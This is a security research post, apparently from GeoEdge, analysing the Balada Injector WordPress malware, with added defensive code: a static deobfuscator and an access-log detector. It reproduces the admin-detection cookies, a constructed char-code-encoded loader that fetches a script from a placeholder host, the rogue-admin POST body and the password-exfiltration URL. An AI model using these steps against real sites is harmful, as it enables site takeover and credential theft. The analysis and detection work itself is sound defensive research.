URL: https://www.geoedge.com/balda-injectors-2-0-evading-detection-gaining-persistence/
Submission: On December 06 via api from IN — Scanned from DE

BALADA INJECTOR 2.0: EVADING DETECTION & GAINING PERSISTENCE

By GeoEdge Team, in Security Research


GeoEdge’s Security team has uncovered a novel technique utilized by the Balada
Injector. Balada Injector is known for its ability to exercise control over
vulnerable websites, implanting malicious scripts that auto-redirect
unsuspecting users to scam or adult pages. To evade detection, the attacker has
implemented a filtering mechanism, which prevents automatic redirection when the
website is accessed by an administrator.

This iteration differs from the previous one. Moriya Pedael, security
researcher at GeoEdge, revealed that the new technique achieves a full takeover
of the website's functionality and keeps persistence on vulnerable websites by
creating a new admin user.


TARGETING USERS

In the past, the attacker directed the auto-redirect at ordinary visitors by
checking for the absence of two cookies, ‘wp-settings’ and ‘wp-settings-time’.

These cookies are built into WordPress and are used to customize the admin
interface. If they are present in the client's browser, the client is an
administrator.

Now the attacker identifies admin clients by a further cookie, on top of the
two mentioned above, or by inspecting the browser's location.

Conditions Balada-Injector uses to detect an admin session:

 1. ‘wp-settings’ cookie is in the document (legacy filter).
 2. ‘wp-settings-time’ cookie is in the document (legacy filter).
 3. ‘logged_in’ cookie is in the document.
 4. ‘wp-admin’ is in window.location.href.
 5. ‘wp-login.php’ is in window.location.href.

Additionally, Balada Injector now redirects users based on their OS type,
ensuring the scam page is more relevant to the target. The figures below
demonstrate this.

Figure 1: Redirect attack on iOS devices.
Figure 2: Redirect attack on other devices.


PERSISTENCE CONTROL ON VULNERABLE WEBSITES

In the past, the attacker's ability to maintain control over a website depended
on exploiting existing vulnerabilities within the site: the more severe the
vulnerability, the more control they could obtain, and sometimes a combination
of several vulnerabilities was needed to gain control at all.
This process remained hidden from everyone except the attacker and the target
website's administrator, who could detect it by examining website logs or
scanning files for infections.

Now, Balada Injector has adopted a new technique to gain persistence control.
The injected script within the compromised website, deployed on the client side,
exclusively targets administrators of the infected websites.

When an admin is connected, the script leverages the admin’s permissions to
create a new admin account, ensuring ongoing access and the ability to reinfect
the website even after it has been patched. To exclusively target
administrators, the attacker employs the five detection mechanisms described
earlier.


STATIC ANALYSIS

As in the common Balada Injector attack pattern, the malicious script is
obfuscated with functions like ‘eval’ and ‘String.fromCharCode’, making it
complex and hard for humans or automated tools to read. These techniques are
used to evade lexical, signature-based detection methods.

As the screenshot below shows, static detection methods cannot tell whether the
script built by the ‘eval’ call is malicious until the ASCII character codes
are assembled into a normal script, or until the script is already known to be
malicious.

Figure 3: Screenshot of the script embedding in the infected page.
Figure 4: Decoded script

The embedded script creates a new script element that is loaded from the
malicious domain itself. The path of this script is:

hxxp://{malicious_domain}/src/page.js

This script is also obfuscated with the encoding technique described above.
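The decoding step described above, as an added example that is not part of the GeoEdge post: it unwraps String.fromCharCode(...) statically (no eval) and then scans the result for the admin-filter and create-user strings this page lists. The encoded sample and the host name malicious-domain.invalid are constructed for the demo.

```javascript
// Added example (not from the GeoEdge post): statically unwrap the
// String.fromCharCode(...) layer without running eval, then scan the recovered
// text for the admin-filter and create-user strings described on this page.
const CHARCODE_CALL = /String\.fromCharCode\(\s*([\d\s,]+?)\s*\)/g;

// Indicator strings taken from the post: the admin-session filter, the
// create-user flow and the password exfiltration path.
const INDICATORS = [
  'wp-settings', 'wp-settings-time', 'logged_in', 'wp-admin', 'wp-login.php',
  'wpsapiadmin', '/wp-admin/users.php', '/wp-admin/user-new.php',
  'action=createuser', '_wpnonce_create-user', 'role=administrator', '/set.php?z=',
];

// Replace each String.fromCharCode(104,116,...) call with the string it builds,
// emitted as a JS string literal so the surrounding code stays readable.
// Decoding maps code points one by one; the script is never evaluated.
function decodeCharCodes(source) {
  return source.replace(CHARCODE_CALL, (_match, list) => {
    const text = list.split(',')
      .map(n => parseInt(n, 10))
      .filter(Number.isFinite)
      .map(c => String.fromCharCode(c))
      .join('');
    return JSON.stringify(text);
  });
}

function findIndicators(text) {
  return INDICATORS.filter(ind => text.includes(ind));
}

// Returns the decoded script, whether eval() wraps it, and the indicators hit.
function analyze(source) {
  const decoded = decodeCharCodes(source);
  return { decoded, usesEval: /\beval\s*\(/.test(source), hits: findIndicators(decoded) };
}

// Constructed sample in the shape the post describes: a char-code encoded loader
// that checks for an admin session and pulls /src/page.js from a placeholder host.
const INNER = 'if(document.cookie.indexOf("logged_in")<0&&location.href.indexOf("wp-admin")<0){'
  + 'var s=document.createElement("script");s.src="hxxp://malicious-domain.invalid/src/page.js";'
  + 'document.head.appendChild(s);}';
const SAMPLE = 'eval(String.fromCharCode(' + [...INNER].map(c => c.charCodeAt(0)).join(',') + '))';
```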

Figure 5: Part of the script ‘page.js’ from the malicious domain.

The flow of the ‘page.js’ script:

The filtering mechanism is executed first, and if the connected client is
identified as an admin (possessing the ‘wpsapiadmin’ cookie), the ‘create-user’
dynamic script is initiated.

Figure 6: Screenshot of initiating the ‘create-user’ attack on admins.
Figure 7: Dynamic ‘create-user’ script.

The Malicious ‘Create-User’ Script:

Once the attacker identifies the client as an admin, they ensure that the
targeted website has not already been compromised by checking the website’s
users. A request is made to ‘/wp-admin/users.php’ to check if a foreign admin
user (the user to be created during the successful phase) exists. The malicious
admin created in this attack is ‘greeceman.’

If it does not exist, the attacker makes another request, this time to
‘/wp-admin/user-new.php’ to get a ‘wp-nonce’ to create a new user.

A WordPress nonce serves as a unique security code that safeguards URLs and
forms against harmful attacks. It assists WordPress in verifying the legitimacy
of a request, thus preventing unauthorized actions and inputs.

After obtaining the nonce, the attacker sends another request to
‘/wp-admin/user-new.php’, this time a POST request with the
‘application/x-www-form-urlencoded’ content-type header and the following body
values:

    action=createuser
    _wpnonce_create-user={the_created_nonce}
    user_login=greeceman
    email=greeceman@mail.com
    pass1={random_created_password}@
    pass2={random_created_password}@
    role=administrator

The final request is a GET request to the attacker's domain with the
compromised site's hostname (window.location.hostname) and the created password
as query parameters, sending this information back to the attacker.

A query parameter is a piece of information appended to the end of a URL,
typically following a question mark.

The final request is:

hxxps://{maliciousDomain}/set.php?z={locationHostname}-p-{userPassword}@

At the time of writing, the domain found delivering this script is
decentralappps[.]com
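A server-side detection for the create-user sequence just described, as an added example that is not part of the GeoEdge post. It assumes combined-format access logs, that the scripted flow completes within seconds, and that a scripted POST carries a front-end Referer rather than one under /wp-admin/; the log lines and IP addresses are constructed.

```javascript
// Added example (not from the GeoEdge post): hunt WordPress access logs (combined
// log format) for the scripted sequence GET /wp-admin/users.php, GET /wp-admin/user-new.php,
// then POST /wp-admin/user-new.php from one client within seconds. Log lines are constructed.
const WINDOW_MS = 60 * 1000; // assumption: the injected script finishes in well under a minute
const LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" \d{3} \S+ "([^"]*)"/;
const MONTHS = { Jan: 0, Feb: 1, Mar: 2, Apr: 3, May: 4, Jun: 5, Jul: 6, Aug: 7, Sep: 8, Oct: 9, Nov: 10, Dec: 11 };
// CLF timestamp such as "06/Dec/2023:14:21:03 +0000" -> epoch milliseconds (UTC).
function parseClfTime(s) {
  const m = /^(\d{2})\/(\w{3})\/(\d{4}):(\d{2}):(\d{2}):(\d{2}) ([+-])(\d{2})(\d{2})$/.exec(s);
  if (!m) return NaN;
  const local = Date.UTC(+m[3], MONTHS[m[2]], +m[1], +m[4], +m[5], +m[6]);
  const offset = (m[7] === '-' ? -1 : 1) * (+m[8] * 60 + +m[9]) * 60000;
  return local - offset;
}
// One access-log line -> { ip, ts, method, path, referer }, or null if unparsable.
function parseLine(line) {
  const m = LINE_RE.exec(line);
  return m ? { ip: m[1], ts: parseClfTime(m[2]), method: m[3], path: m[4], referer: m[5] } : null;
}
function detectCreateUserSequence(lines) {
  const byIp = new Map();
  for (const e of lines.map(parseLine)) {
    if (e) byIp.set(e.ip, [...(byIp.get(e.ip) || []), e]);
  }
  const alerts = [];
  for (const [ip, events] of byIp) {
    events.sort((a, b) => a.ts - b.ts);
    for (const post of events) {
      if (post.method !== 'POST' || !post.path.startsWith('/wp-admin/user-new.php')) continue;
      const recent = events.filter(e => e.ts <= post.ts && post.ts - e.ts <= WINDOW_MS);
      const listedUsers = recent.some(e => e.method === 'GET' && e.path.startsWith('/wp-admin/users.php'));
      const fetchedForm = recent.some(e => e.method === 'GET' && e.path.startsWith('/wp-admin/user-new.php'));
      if (!listedUsers || !fetchedForm) continue;
      // Assumption: a human admin submits from /wp-admin/; the injected script fires from a front-end page.
      alerts.push({ ip, at: new Date(post.ts).toISOString(), offAdminReferer: !post.referer.includes('/wp-admin/') });
    }
  }
  return alerts;
}
// Constructed sample: a 4-second scripted sequence from 203.0.113.5 and a human
// admin at 198.51.100.7 who takes minutes between the same steps (no alert).
const SAMPLE_LOG = [
  '203.0.113.5 - - [06/Dec/2023:14:21:00 +0000] "GET /wp-admin/users.php HTTP/1.1" 200 5120 "https://victim.example/hello-world/" "Mozilla/5.0"',
  '203.0.113.5 - - [06/Dec/2023:14:21:02 +0000] "GET /wp-admin/user-new.php HTTP/1.1" 200 4096 "https://victim.example/hello-world/" "Mozilla/5.0"',
  '203.0.113.5 - - [06/Dec/2023:14:21:04 +0000] "POST /wp-admin/user-new.php HTTP/1.1" 302 0 "https://victim.example/hello-world/" "Mozilla/5.0"',
  '198.51.100.7 - - [06/Dec/2023:15:00:00 +0000] "GET /wp-admin/users.php HTTP/1.1" 200 5120 "https://victim.example/wp-admin/" "Mozilla/5.0"',
  '198.51.100.7 - - [06/Dec/2023:15:03:10 +0000] "GET /wp-admin/user-new.php HTTP/1.1" 200 4096 "https://victim.example/wp-admin/users.php" "Mozilla/5.0"',
  '198.51.100.7 - - [06/Dec/2023:15:05:30 +0000] "POST /wp-admin/user-new.php HTTP/1.1" 302 0 "https://victim.example/wp-admin/user-new.php" "Mozilla/5.0"',
];
```

A legitimate admin walks the same three URLs, so the timing window and the Referer check carry the signal; pair an alert with a review of the site's administrator list.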


ATTRIBUTION OF THE PERSISTENCE CODE TO BALADA INJECTOR

There are a few characteristics we found in our analysis that clearly attribute
this campaign to Balada Injector:

 1. The domain delivering the malicious code also delivers the final stage of
    Balada Injector's common redirect attack. Figures 1 and 2 are examples of
    the redirect pages this domain leads to.
 2. The script is obfuscated with the ‘eval’ + ‘String.fromCharCode’ functions.
 3. The same admin filtering / targeting mechanism is used.

GeoEdge is in contact with compromised sites, and our research into this attack
is ongoing. Stay informed about the latest trends and emerging threats by
keeping up to date. Reach out to the GeoEdge team for immediate support! 

GEOEDGE TEAM

GeoEdge is the trusted cyber security and ad quality partner for publishers and
platforms in the digital advertising industry. With more than a decade of
experience, we’ve built solutions to prevent tomorrow’s threats, today.‎
